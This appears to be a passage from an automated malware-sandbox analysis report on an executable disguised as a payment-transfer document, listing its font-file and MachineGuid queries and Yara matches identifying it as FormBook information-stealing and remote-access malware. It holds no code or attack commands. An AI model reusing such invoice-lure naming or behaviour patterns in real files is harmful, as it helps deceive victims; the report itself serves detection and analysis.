Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
